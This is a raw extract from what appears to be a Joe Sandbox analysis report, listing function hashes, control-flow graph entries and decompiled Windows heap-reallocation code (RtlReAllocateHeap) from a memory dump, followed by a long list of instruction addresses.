                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 2fd86c46697fab8aa473301d737a642083713755c6c1114e63109eb20986bac6
                                                                                                                                                                            • Instruction ID: 5d72941b6be6ae127762a714e74f9a96b5a6eb4b1e203fcee204b0b943a73b78
                                                                                                                                                                            • Opcode Fuzzy Hash: 2fd86c46697fab8aa473301d737a642083713755c6c1114e63109eb20986bac6
                                                                                                                                                                            • Instruction Fuzzy Hash: 0D90023125108802D610A159850478E001547D0301F95C815A4514618DD6B988957123
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 261 1d862bc0-1d862bcc LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 6a74af1c097df8d40304c45576af230010fd80d931b869f794a9d66aceaf4cb2
                                                                                                                                                                            • Instruction ID: d27238fc1e35811860690909f59a50eeb3071c794777e8fe5d317458cf1972f4
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a74af1c097df8d40304c45576af230010fd80d931b869f794a9d66aceaf4cb2
                                                                                                                                                                            • Instruction Fuzzy Hash: A590023125100402D600A599550868A001547E0301F91D415A5114515ED67988957133
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 259 1d862b10-1d862b1c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 4046b9ca5be2ef1c062100d5e62a5b4c3ef125a5bb2f8469654ab11e52f4bfbf
                                                                                                                                                                            • Instruction ID: cde0dcd5c175c6c6819de24c2f793d8af4cea33185edac27137b80b91ff4f24a
                                                                                                                                                                            • Opcode Fuzzy Hash: 4046b9ca5be2ef1c062100d5e62a5b4c3ef125a5bb2f8469654ab11e52f4bfbf
                                                                                                                                                                            • Instruction Fuzzy Hash: 6390023125100802D680B159450468E001547D1301FD1C419A0115614DDA398A5D77A3
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: aeec45d9ba27b2ec5d341742c85b033e3fa1e564f0c3cea5502c4d1d6b84985d
                                                                                                                                                                            • Instruction ID: 7500ad1e47bdd4f0c3e3785861b81aa92781aad82219b13024cf66144f8cc4fa
                                                                                                                                                                            • Opcode Fuzzy Hash: aeec45d9ba27b2ec5d341742c85b033e3fa1e564f0c3cea5502c4d1d6b84985d
                                                                                                                                                                            • Instruction Fuzzy Hash: B690023165510402D600A159461474A101547D0301FA1C815A0514528DD7B9895575A3
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 254 1d862b2a-1d862b2f 255 1d862b31-1d862b38 254->255 256 1d862b3f-1d862b46 LdrInitializeThunk 254->256
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e24b1c8f1b15fe0b0ace271f8cb6f8c8d91be5d50c5b6f1d3b1fab116ce9ba84
                                                                                                                                                                            • Instruction ID: 7a2ce42e44004c6c24803b8d40dde0129f3cc5c869cc740977bd641be873708d
                                                                                                                                                                            • Opcode Fuzzy Hash: e24b1c8f1b15fe0b0ace271f8cb6f8c8d91be5d50c5b6f1d3b1fab116ce9ba84
                                                                                                                                                                            • Instruction Fuzzy Hash: 7FB092729424C6CAEB01EB604B08B1B7A10ABD0711F66C4A6E25A0641E873CC0A5F277
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                            			E1D8CFDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t130;
                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                            				intOrPtr _t138;
                                                                                                                                                                            				intOrPtr _t139;
                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                            				signed int _t150;
                                                                                                                                                                            				intOrPtr _t151;
                                                                                                                                                                            				signed int _t152;
                                                                                                                                                                            				intOrPtr _t155;
                                                                                                                                                                            				intOrPtr _t159;
                                                                                                                                                                            				intOrPtr _t172;
                                                                                                                                                                            				signed int _t173;
                                                                                                                                                                            				signed int _t174;
                                                                                                                                                                            				signed char _t177;
                                                                                                                                                                            				signed int _t178;
                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                            				void* _t184;
                                                                                                                                                                            				signed char _t192;
                                                                                                                                                                            				signed int _t193;
                                                                                                                                                                            				intOrPtr _t195;
                                                                                                                                                                            				intOrPtr _t199;
                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                            				signed int _t226;
                                                                                                                                                                            				signed char _t236;
                                                                                                                                                                            				intOrPtr _t240;
                                                                                                                                                                            				signed int* _t248;
                                                                                                                                                                            				signed int _t253;
                                                                                                                                                                            				signed int _t255;
                                                                                                                                                                            				signed int _t267;
                                                                                                                                                                            				signed int _t278;
                                                                                                                                                                            				signed int* _t279;
                                                                                                                                                                            				intOrPtr* _t283;
                                                                                                                                                                            				void* _t284;
                                                                                                                                                                            				void* _t286;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x40);
                                                                                                                                                                            				_push(0x1d8fd430);
                                                                                                                                                                            				E1D877BE4(__ebx, __edi, __esi);
                                                                                                                                                                            				_t281 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
                                                                                                                                                                            				 *((char*)(_t284 - 0x19)) = 0;
                                                                                                                                                                            				 *(_t284 - 0x24) = 0;
                                                                                                                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t284 - 4)) = 0;
                                                                                                                                                                            					 *((intOrPtr*)(_t284 - 4)) = 1;
                                                                                                                                                                            					_t130 = E1D817662("RtlReAllocateHeap");
                                                                                                                                                                            					__eflags = _t130;
                                                                                                                                                                            					if(_t130 == 0) {
                                                                                                                                                                            						L72:
                                                                                                                                                                            						 *(_t284 - 0x24) = 0;
                                                                                                                                                                            						L73:
                                                                                                                                                                            						 *((intOrPtr*)(_t284 - 4)) = 0;
                                                                                                                                                                            						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
                                                                                                                                                                            						E1D8D02E6(_t281);
                                                                                                                                                                            						_t132 =  *(_t284 - 0x24);
                                                                                                                                                                            						goto L75;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t236 =  *(__ecx + 0x44) | __edx;
                                                                                                                                                                            					 *(_t284 - 0x30) = _t236;
                                                                                                                                                                            					 *(_t284 - 0x34) = _t236 | 0x10000100;
                                                                                                                                                                            					__eflags =  *(_t284 + 0xc);
                                                                                                                                                                            					if( *(_t284 + 0xc) == 0) {
                                                                                                                                                                            						_t267 = 1;
                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t267 =  *(_t284 + 0xc);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
                                                                                                                                                                            					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
                                                                                                                                                                            					__eflags = _t138 -  *(_t284 + 0xc);
                                                                                                                                                                            					if(_t138 <  *(_t284 + 0xc)) {
                                                                                                                                                                            						L68:
                                                                                                                                                                            						_t139 =  *[fs:0x30];
                                                                                                                                                                            						__eflags =  *(_t139 + 0xc);
                                                                                                                                                                            						if( *(_t139 + 0xc) == 0) {
                                                                                                                                                                            							_push("HEAP: ");
                                                                                                                                                                            							E1D81B910();
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push( *((intOrPtr*)(_t281 + 0x78)));
                                                                                                                                                                            						E1D81B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
                                                                                                                                                                            						goto L72;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
                                                                                                                                                                            					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
                                                                                                                                                                            						goto L68;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t284 - 0x20) = 0;
                                                                                                                                                                            					__eflags = _t236 & 0x00000001;
                                                                                                                                                                            					if((_t236 & 0x00000001) == 0) {
                                                                                                                                                                            						E1D82FED0( *((intOrPtr*)(_t281 + 0xc8)));
                                                                                                                                                                            						 *((char*)(_t284 - 0x19)) = 1;
                                                                                                                                                                            						_t226 =  *(_t284 - 0x30) | 0x10000101;
                                                                                                                                                                            						__eflags = _t226;
                                                                                                                                                                            						 *(_t284 - 0x34) = _t226;
                                                                                                                                                                            					}
                                                                                                                                                                            					E1D8D0835(_t281, 0);
                                                                                                                                                                            					_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                                                                                                                            					_t269 = _t277 - 8;
                                                                                                                                                                            					__eflags =  *((char*)(_t269 + 7)) - 5;
                                                                                                                                                                            					if( *((char*)(_t269 + 7)) == 5) {
                                                                                                                                                                            						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
                                                                                                                                                                            						__eflags = _t269;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t284 - 0x2c) = _t269;
                                                                                                                                                                            					 *(_t284 - 0x28) = _t269;
                                                                                                                                                                            					_t240 = _t281;
                                                                                                                                                                            					_t149 = E1D81753F(_t240, _t269, "RtlReAllocateHeap");
                                                                                                                                                                            					__eflags = _t149;
                                                                                                                                                                            					if(_t149 == 0) {
                                                                                                                                                                            						L53:
                                                                                                                                                                            						_t150 =  *(_t284 - 0x24);
                                                                                                                                                                            						__eflags = _t150;
                                                                                                                                                                            						if(_t150 == 0) {
                                                                                                                                                                            							goto L73;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t150 -  *0x1d9147c8; // 0x0
                                                                                                                                                                            						_t151 =  *[fs:0x30];
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t152 =  *(_t151 + 0x68);
                                                                                                                                                                            							 *(_t284 - 0x48) = _t152;
                                                                                                                                                                            							__eflags = _t152 & 0x00000800;
                                                                                                                                                                            							if((_t152 & 0x00000800) == 0) {
                                                                                                                                                                            								goto L73;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(_t284 - 0x20) -  *0x1d9147cc; // 0x0
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								goto L73;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d9147ce; // 0x0
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								goto L73;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t155 =  *[fs:0x30];
                                                                                                                                                                            							__eflags =  *(_t155 + 0xc);
                                                                                                                                                                            							if( *(_t155 + 0xc) == 0) {
                                                                                                                                                                            								_push("HEAP: ");
                                                                                                                                                                            								E1D81B910();
                                                                                                                                                                            							} else {
                                                                                                                                                                            								E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            							}
                                                                                                                                                                            							_push(E1D8C823A(_t281,  *(_t284 - 0x20)));
                                                                                                                                                                            							_push( *(_t284 + 0xc));
                                                                                                                                                                            							E1D81B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
                                                                                                                                                                            							L59:
                                                                                                                                                                            							_t159 =  *[fs:0x30];
                                                                                                                                                                            							__eflags =  *((char*)(_t159 + 2));
                                                                                                                                                                            							if( *((char*)(_t159 + 2)) != 0) {
                                                                                                                                                                            								 *0x1d9147a1 = 1;
                                                                                                                                                                            								 *0x1d914100 = 0;
                                                                                                                                                                            								asm("int3");
                                                                                                                                                                            								 *0x1d9147a1 = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L73;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *(_t151 + 0xc);
                                                                                                                                                                            						if( *(_t151 + 0xc) == 0) {
                                                                                                                                                                            							_push("HEAP: ");
                                                                                                                                                                            							E1D81B910();
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push( *(_t284 + 0xc));
                                                                                                                                                                            						E1D81B910("Just reallocated block at %p to %Ix bytes\n",  *0x1d9147c8);
                                                                                                                                                                            						goto L59;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _t277 -  *0x1d9147c8; // 0x0
                                                                                                                                                                            						_t172 =  *[fs:0x30];
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t173 =  *(_t172 + 0x68);
                                                                                                                                                                            							 *(_t284 - 0x44) = _t173;
                                                                                                                                                                            							__eflags = _t173 & 0x00000800;
                                                                                                                                                                            							if((_t173 & 0x00000800) == 0) {
                                                                                                                                                                            								L38:
                                                                                                                                                                            								_t174 = E1D832710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
                                                                                                                                                                            								 *(_t284 - 0x24) = _t174;
                                                                                                                                                                            								__eflags = _t174;
                                                                                                                                                                            								if(_t174 != 0) {
                                                                                                                                                                            									_t75 = _t174 - 8; // -8
                                                                                                                                                                            									_t278 = _t75;
                                                                                                                                                                            									__eflags =  *((char*)(_t278 + 7)) - 5;
                                                                                                                                                                            									if( *((char*)(_t278 + 7)) == 5) {
                                                                                                                                                                            										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
                                                                                                                                                                            										__eflags = _t278;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t248 = _t278;
                                                                                                                                                                            									 *(_t284 - 0x28) = _t278;
                                                                                                                                                                            									__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                            									if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                            										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
                                                                                                                                                                            										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                            											_push(_t248);
                                                                                                                                                                            											_t269 = _t278;
                                                                                                                                                                            											E1D8DD646(0, _t281, _t278, _t278, _t281, __eflags);
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t278 + 2) & 0x00000002;
                                                                                                                                                                            									if(( *(_t278 + 2) & 0x00000002) == 0) {
                                                                                                                                                                            										_t177 =  *(_t278 + 3);
                                                                                                                                                                            										 *(_t284 - 0x1b) = _t177;
                                                                                                                                                                            										_t178 = _t177 & 0x000000ff;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t183 = E1D853AE9(_t278);
                                                                                                                                                                            										 *(_t284 - 0x30) = _t183;
                                                                                                                                                                            										__eflags =  *(_t281 + 0x40) & 0x08000000;
                                                                                                                                                                            										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
                                                                                                                                                                            											 *_t183 = 0;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t184 = E1D84FDB9(1, _t269);
                                                                                                                                                                            											_t253 =  *(_t284 - 0x30);
                                                                                                                                                                            											 *_t253 = _t184;
                                                                                                                                                                            											_t183 = _t253;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t178 =  *((intOrPtr*)(_t183 + 2));
                                                                                                                                                                            									}
                                                                                                                                                                            									 *(_t284 - 0x20) = _t178;
                                                                                                                                                                            									__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                            									if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                            										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
                                                                                                                                                                            										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
                                                                                                                                                                            										__eflags =  *_t278;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								E1D8D0D24(_t281);
                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                            								E1D8D0835(_t281, 0);
                                                                                                                                                                            								goto L53;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *0x1d9147cc;
                                                                                                                                                                            							if( *0x1d9147cc == 0) {
                                                                                                                                                                            								goto L38;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t279 =  *(_t284 - 0x28);
                                                                                                                                                                            							_t269 =  *(_t284 - 0x2c);
                                                                                                                                                                            							__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                            							if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                            								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
                                                                                                                                                                            								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_push(_t240);
                                                                                                                                                                            									E1D8DD646(0, _t281, _t279, _t279, _t281, __eflags);
                                                                                                                                                                            									_t269 =  *(_t284 - 0x2c);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t279[0] & 0x00000002;
                                                                                                                                                                            							if((_t279[0] & 0x00000002) == 0) {
                                                                                                                                                                            								_t192 = _t279[0];
                                                                                                                                                                            								 *(_t284 - 0x1a) = _t192;
                                                                                                                                                                            								_t193 = _t192 & 0x000000ff;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t209 = E1D853AE9(_t279);
                                                                                                                                                                            								 *(_t284 - 0x30) = _t209;
                                                                                                                                                                            								_t193 =  *(_t209 + 2) & 0x0000ffff;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t255 = _t193;
                                                                                                                                                                            							 *(_t284 - 0x20) = _t193;
                                                                                                                                                                            							__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                            							if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                            								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
                                                                                                                                                                            								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
                                                                                                                                                                            								__eflags =  *_t279;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t255;
                                                                                                                                                                            							if(_t255 == 0) {
                                                                                                                                                                            								L37:
                                                                                                                                                                            								_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t255 -  *0x1d9147cc; // 0x0
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L37;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d9147ce; // 0x0
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L37;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t195 =  *[fs:0x30];
                                                                                                                                                                            								__eflags =  *(_t195 + 0xc);
                                                                                                                                                                            								if( *(_t195 + 0xc) == 0) {
                                                                                                                                                                            									_push("HEAP: ");
                                                                                                                                                                            									E1D81B910();
                                                                                                                                                                            								} else {
                                                                                                                                                                            									E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t269 =  *(_t284 - 0x20);
                                                                                                                                                                            								_push(E1D8C823A(_t281,  *(_t284 - 0x20)));
                                                                                                                                                                            								_push( *(_t284 + 0xc));
                                                                                                                                                                            								_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                                                                                                                            								E1D81B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
                                                                                                                                                                            								_t286 = _t286 + 0x10;
                                                                                                                                                                            								L18:
                                                                                                                                                                            								_t199 =  *[fs:0x30];
                                                                                                                                                                            								__eflags =  *((char*)(_t199 + 2));
                                                                                                                                                                            								if( *((char*)(_t199 + 2)) != 0) {
                                                                                                                                                                            									 *0x1d9147a1 = 1;
                                                                                                                                                                            									 *0x1d914100 = 0;
                                                                                                                                                                            									asm("int3");
                                                                                                                                                                            									 *0x1d9147a1 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L38;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *(_t172 + 0xc);
                                                                                                                                                                            						if( *(_t172 + 0xc) == 0) {
                                                                                                                                                                            							_push("HEAP: ");
                                                                                                                                                                            							E1D81B910();
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push( *(_t284 + 0xc));
                                                                                                                                                                            						E1D81B910("About to reallocate block at %p to %Ix bytes\n",  *0x1d9147c8);
                                                                                                                                                                            						_t286 = _t286 + 0xc;
                                                                                                                                                                            						goto L18;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t283 =  *0x1d91374c; // 0x0
                                                                                                                                                                            					 *0x1d9191e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
                                                                                                                                                                            					_t132 =  *_t283();
                                                                                                                                                                            					L75:
                                                                                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
                                                                                                                                                                            					return _t132;
                                                                                                                                                                            				}
                                                                                                                                                                            			}





































                                                                                                                                                                            0x1d8cfdf4
                                                                                                                                                                            0x1d8cfdf6
                                                                                                                                                                            0x1d8cfdfb
                                                                                                                                                                            0x1d8cfe02
                                                                                                                                                                            0x1d8cfe04
                                                                                                                                                                            0x1d8cfe09
                                                                                                                                                                            0x1d8cfe0c
                                                                                                                                                                            0x1d8cfe16
                                                                                                                                                                            0x1d8cfe35
                                                                                                                                                                            0x1d8cfe38
                                                                                                                                                                            0x1d8cfe46
                                                                                                                                                                            0x1d8cfe4b
                                                                                                                                                                            0x1d8cfe4d
                                                                                                                                                                            0x1d8d0277
                                                                                                                                                                            0x1d8d0277
                                                                                                                                                                            0x1d8d027a
                                                                                                                                                                            0x1d8d027a
                                                                                                                                                                            0x1d8d02c2
                                                                                                                                                                            0x1d8d02c9
                                                                                                                                                                            0x1d8d02ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d02ce
                                                                                                                                                                            0x1d8cfe56
                                                                                                                                                                            0x1d8cfe58
                                                                                                                                                                            0x1d8cfe62
                                                                                                                                                                            0x1d8cfe65
                                                                                                                                                                            0x1d8cfe69
                                                                                                                                                                            0x1d8cfe72
                                                                                                                                                                            0x1d8cfe72
                                                                                                                                                                            0x1d8cfe6b
                                                                                                                                                                            0x1d8cfe6b
                                                                                                                                                                            0x1d8cfe6b
                                                                                                                                                                            0x1d8cfe81
                                                                                                                                                                            0x1d8cfe84
                                                                                                                                                                            0x1d8cfe87
                                                                                                                                                                            0x1d8cfe8a
                                                                                                                                                                            0x1d8d0231
                                                                                                                                                                            0x1d8d0231
                                                                                                                                                                            0x1d8d0237
                                                                                                                                                                            0x1d8d023a
                                                                                                                                                                            0x1d8d0259
                                                                                                                                                                            0x1d8d025e
                                                                                                                                                                            0x1d8d023c
                                                                                                                                                                            0x1d8d0251
                                                                                                                                                                            0x1d8d0256
                                                                                                                                                                            0x1d8d0264
                                                                                                                                                                            0x1d8d026f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d0274
                                                                                                                                                                            0x1d8cfe90
                                                                                                                                                                            0x1d8cfe93
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfe9b
                                                                                                                                                                            0x1d8cfe9f
                                                                                                                                                                            0x1d8cfea2
                                                                                                                                                                            0x1d8cfeaa
                                                                                                                                                                            0x1d8cfeaf
                                                                                                                                                                            0x1d8cfeb6
                                                                                                                                                                            0x1d8cfeb6
                                                                                                                                                                            0x1d8cfebb
                                                                                                                                                                            0x1d8cfebb
                                                                                                                                                                            0x1d8cfec2
                                                                                                                                                                            0x1d8cfec7
                                                                                                                                                                            0x1d8cfeca
                                                                                                                                                                            0x1d8cfecd
                                                                                                                                                                            0x1d8cfed1
                                                                                                                                                                            0x1d8cfeda
                                                                                                                                                                            0x1d8cfeda
                                                                                                                                                                            0x1d8cfeda
                                                                                                                                                                            0x1d8cfedc
                                                                                                                                                                            0x1d8cfedf
                                                                                                                                                                            0x1d8cfee7
                                                                                                                                                                            0x1d8cfee9
                                                                                                                                                                            0x1d8cfeee
                                                                                                                                                                            0x1d8cfef0
                                                                                                                                                                            0x1d8d0122
                                                                                                                                                                            0x1d8d0122
                                                                                                                                                                            0x1d8d0125
                                                                                                                                                                            0x1d8d0127
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d012d
                                                                                                                                                                            0x1d8d0133
                                                                                                                                                                            0x1d8d0139
                                                                                                                                                                            0x1d8d01a7
                                                                                                                                                                            0x1d8d01aa
                                                                                                                                                                            0x1d8d01ad
                                                                                                                                                                            0x1d8d01b2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d01bc
                                                                                                                                                                            0x1d8d01c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d01cd
                                                                                                                                                                            0x1d8d01d4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d01da
                                                                                                                                                                            0x1d8d01e0
                                                                                                                                                                            0x1d8d01e3
                                                                                                                                                                            0x1d8d0202
                                                                                                                                                                            0x1d8d0207
                                                                                                                                                                            0x1d8d01e5
                                                                                                                                                                            0x1d8d01fa
                                                                                                                                                                            0x1d8d01ff
                                                                                                                                                                            0x1d8d0218
